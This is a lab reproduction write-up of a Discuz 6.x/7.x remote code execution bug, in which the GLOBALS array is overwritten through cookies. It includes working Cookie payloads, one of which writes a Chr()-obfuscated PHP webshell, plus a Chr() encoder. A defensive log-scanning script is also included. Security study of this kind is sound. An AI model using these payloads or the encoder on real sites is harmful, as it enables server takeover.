Vulnerability description

In PHP 5.3.x the default value of the request_order directive in php.ini is GP, so $_REQUEST no longer includes $_COOKIE. An attacker can therefore pass GLOBALS through the Cookie header to overwrite global variables and go on to achieve code execution.

Affected versions

Discuz 6.x.

Discuz 7.x.

Reproduction

git clone https://github.com/vulhub/vulhub.git
cd vulhub/discuz/wooyun-2010-080723
docker-compose up -d

Once the environment is up, visiting http://<ip>:8080 directly shows the error "Discuz! info: Can not connect to MySQL server". Discuz must first be installed from http://<ip>:8080/install: enter db as the database host and choose the database and administrator passwords yourself.

Capture the request for any thread:

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: <ip>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<ip>/forumdisplay.php?fid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; 8p0_sid=uUasIs; 8p0_onlineusernum=1; 8p0_visitedfid=2; 8p0_oldtopics=D13D; 8p0_fid2=1645160609
Connection: close

Send the request to the repeater and change the Cookie to:

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

After sending it, the response contains the phpinfo page. A webshell can be written the same way (file x.php, password oopsdc):

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(111).Chr(111).Chr(112).Chr(115).Chr(100).Chr(99).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))
The Chr() sequence decodes to fputs(fopen('x.php','w'),'<?php @eval($_POST[oopsdc])?>');
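From the defender's side, the two payloads above share an easily detected shape: cookie names that index into GLOBALS, and values that hide PHP code behind Chr() concatenation so that they contain no ';' or quotes. The following Python script is an added example and is not part of the original writeup or of Discuz; it assumes a constructed log format in which each line ends with the request's Cookie header in quotes, parses the cookies the way PHP does (splitting on ';'), flags GLOBALS[...] names and decodes any Chr() runs so the analyst sees the intended code.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not the capture from the original post). The
# assumed format is: METHOD PATH "Cookie: <raw Cookie header>".
SAMPLE_LOG = [
    'GET /viewthread.php?tid=13 "Cookie: 8p0_sid=uUasIs; 8p0_visitedfid=2"',
    'GET /viewthread.php?tid=13 "Cookie: 8p0_sid=uUasIs; '
    'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; '
    'GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"',
    'GET /viewthread.php?tid=13 "Cookie: '
    'GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D='
    'eval(Chr(112).Chr(104).Chr(112).Chr(105).Chr(110).Chr(102).Chr(111).Chr(40).Chr(41))"',
]

COOKIE_RE = re.compile(r'"Cookie: (.*)"\s*$')
# A run of Chr(n) calls joined by '.', as used in the payloads above.
CHR_RUN_RE = re.compile(r"(?:Chr\(\d+\)\.?)+", re.IGNORECASE)


def parse_cookie_header(header: str) -> dict:
    """Split a Cookie header into {name: value}, URL-decoding the names.

    Splitting on ';' mirrors how PHP builds $_COOKIE, which is exactly why
    the obfuscated payload encodes ';' and quotes as Chr() calls: a literal
    ';' would end the cookie value early.
    """
    cookies = {}
    for pair in header.split(";"):
        pair = pair.strip()
        if not pair:
            continue  # trailing ';' leaves an empty pair
        name, _, value = pair.partition("=")
        cookies[unquote(name.strip())] = value.strip()
    return cookies


def decode_chr(value: str) -> str:
    """Replace every Chr(n).Chr(n)... run with the text it spells out."""
    def repl(match):
        return "".join(chr(int(c)) for c in re.findall(r"\d+", match.group(0)))
    return CHR_RUN_RE.sub(repl, value)


def is_globals_overwrite(name: str) -> bool:
    # Legitimate Discuz cookies carry a short prefix such as "8p0_"; a cookie
    # whose name indexes into GLOBALS is a variable-overwrite attempt.
    return name.startswith("GLOBALS[")


def scan_log(lines):
    """Return one finding per suspicious cookie, with its decoded value."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = COOKIE_RE.search(line)
        if not match:
            continue
        for name, value in parse_cookie_header(match.group(1)).items():
            if is_globals_overwrite(name):
                findings.append({
                    "line": lineno,
                    "cookie": name,
                    "raw": value,
                    "decoded": decode_chr(value),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['cookie']} -> {f['decoded']}")
```

Only the cookie name is used for the verdict; the decoded value is carried along so that whoever triages the alert can read the payload without decoding it by hand. The benign first line produces no finding.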

Script for converting between ASCII codes and characters:

import re


# ASCII 2 Word: decode a Chr(n).Chr(n)... expression back into text
def ascii2word(ASCII):
    word = "".join(chr(int(i)) for i in re.findall(r"(\d+)", ASCII))
    print(word)
    return word


# Word 2 ASCII: encode text as a PHP Chr(n).Chr(n)... expression
# (joined with '.', no trailing dot, so the result is valid PHP)
def word2ascii(Word):
    ASCII = ".".join("Chr(" + str(ord(j)) + ")" for j in Word)
    print(ASCII)
    return ASCII


ascii = "Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(111).Chr(111).Chr(112).Chr(115).Chr(100).Chr(99).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)"

word = "fputs(fopen('x.php','w'),'<?php @eval($_POST[oopsdc])?>');"

ascii2word(ascii)
word2ascii(word)

License: this article is released under the CC BY-NC-SA 4.0 license; please credit the source when reposting.